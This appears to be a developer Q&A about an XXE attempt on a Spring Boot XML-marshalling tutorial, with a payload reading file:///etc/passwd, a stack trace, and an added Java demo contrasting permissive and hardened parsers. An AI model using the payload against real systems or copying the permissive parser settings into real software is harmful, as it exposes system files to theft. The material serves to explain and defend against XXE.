I want to carry out an XXE attack. I followed this tutorial, https://grokonez.com/java-integration/convert-java-object-intofrom-xml-spring-boot, and tried to attack it using entity injection.
xxe.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY xxeattack SYSTEM "file:///etc/passwd">
]>
<customer age="20">
<lastname>&xxeattack;</lastname>
<firstname>Jack</firstname>
</customer>
and ran into the following error:
Convert Customer Object to Xml!
Done
[Fatal Error] :2:10: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
Convert Xml to Customer Object!
2018-08-04 09:48:02.308 INFO 57883 --- [main] utoConfigurationReportLoggingInitializer :
Error starting ApplicationContext. To display the auto-configuration report re-run your application with 'debug' enabled.
2018-08-04 09:48:02.317 ERROR 57883 --- [main] o.s.boot.SpringApplication : Application startup failed
java.lang.IllegalStateException: Failed to execute CommandLineRunner
at org.springframework.boot.SpringApplication.callRunner(SpringApplication.java:735) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.callRunners(SpringApplication.java:716) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.afterRefresh(SpringApplication.java:703) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:304) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1118) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1107) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
at com.javasampleapproach.marshalling.SpringBootMarshallingApplication.main(SpringBootMarshallingApplication.java:19) [classes/:na]
Caused by: org.springframework.oxm.UnmarshallingFailureException: SAX reader exception; nested exception is org.xml.sax.SAXParseException; lineNumber: 2; columnNumber: 10; DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
at org.springframework.oxm.castor.CastorMarshaller.unmarshalSaxReader(CastorMarshaller.java:626) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshalSaxSource(AbstractMarshaller.java:435) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshalStreamSource(AbstractMarshaller.java:463) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at org.springframework.oxm.support.AbstractMarshaller.unmarshal(AbstractMarshaller.java:354) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
at com.javasampleapproach.marshalling.xmlconvert.XmlConverter.convertFromXMLToObject(XmlConverter.java:46) ~[classes/:na]
at com.javasampleapproach.marshalling.SpringBootMarshallingApplication.run(SpringBootMarshallingApplication.java:36) [classes/:na]
at org.springframework.boot.SpringApplication.callRunner(SpringApplication.java:732) [spring-boot-1.5.7.RELEASE.jar:1.5.7.RELEASE]
... 6 common frames omitted
Caused by: org.xml.sax.SAXParseException: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.
at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source) ~[xercesImpl-2.11.0.jar:na]
at org.springframework.oxm.castor.CastorMarshaller.unmarshalSaxReader(CastorMarshaller.java:622) ~[spring-oxm-4.3.11.RELEASE.jar:4.3.11.RELEASE]
... 12 common frames omitted
I have been researching this for 2 days and still cannot enable parsing of the illegal entities.
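The feature named in the stack trace, "http://apache.org/xml/features/disallow-doctype-decl", is the standard Xerces switch that rejects any DOCTYPE before an entity can be declared; Spring OXM's AbstractMarshaller (which CastorMarshaller extends) turns it on by default and exposes it through the setSupportDtd and setProcessExternalEntities properties, which is why the tutorial's stock configuration is not exploitable. The following added example is not part of the original question or the tutorial's code; it uses plain JAXP with no Spring dependency to parse the same payload with a permissive parser and with a hardened one. The permissive parser installs a hypothetical EntityResolver that substitutes a constructed string for the SYSTEM identifier, so the demo shows that the parser tries to fetch file:///etc/passwd and splices the result into <lastname> without actually reading the file; the hardened parser reproduces the SAXParseException from the question.

```java
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeDemo {

    // Constructed payload, the same shape as the xxe.xml from the question.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
        "<!DOCTYPE test [\n" +
        "<!ENTITY xxeattack SYSTEM \"file:///etc/passwd\">\n" +
        "]>\n" +
        "<customer age=\"20\">\n" +
        "<lastname>&xxeattack;</lastname>\n" +
        "<firstname>Jack</firstname>\n" +
        "</customer>\n";

    // Permissive parser: DOCTYPE allowed and external general entities resolved.
    // This is the configuration an attacker needs; never ship it in a service.
    static DocumentBuilder permissiveParser() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", false);
        f.setFeature("http://xml.org/sax/features/external-general-entities", true);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", true);
        DocumentBuilder b = f.newDocumentBuilder();
        // Hypothetical resolver for the demo: it intercepts the SYSTEM identifier and
        // returns a constructed string instead of letting Xerces open the real file.
        // Without this resolver the parser would read /etc/passwd itself and the
        // contents would appear in <lastname>, which is the XXE data-exfiltration path.
        b.setEntityResolver((publicId, systemId) -> {
            System.out.println("parser asked to resolve: " + systemId);
            // Replacement text must not contain '<' or '&', or it is parsed as markup.
            return new InputSource(new StringReader("substituted contents of " + systemId));
        });
        return b;
    }

    // Hardened parser: the same disallow-doctype-decl=true that Spring OXM applies
    // by default, plus the belt-and-braces features OWASP recommends for Xerces.
    static DocumentBuilder hardenedParser() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Unmarshal the document and return what ended up inside <lastname>.
    static String lastname(DocumentBuilder b, String xml) throws Exception {
        Document d = b.parse(new InputSource(new StringReader(xml)));
        return d.getElementsByTagName("lastname").item(0).getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Permissive: the entity is expanded, so the resolver's text lands in <lastname>.
        System.out.println("permissive lastname = " + lastname(permissiveParser(), PAYLOAD));
        // Hardened: the DOCTYPE itself is rejected before any entity is declared.
        try {
            lastname(hardenedParser(), PAYLOAD);
            System.out.println("hardened parser accepted the payload (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected payload: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`; no third-party jars are needed because the JDK bundles Xerces. The hardened branch prints the same "DOCTYPE is disallowed when the feature ... set to true" message that appears in the question's trace. In the tutorial's Spring Boot project the equivalent switch is on the CastorMarshaller bean itself (setSupportDtd(true) and setProcessExternalEntities(true)); flipping both is exactly what makes an unmarshalling endpoint XXE-vulnerable, so do it only in a throwaway lab instance.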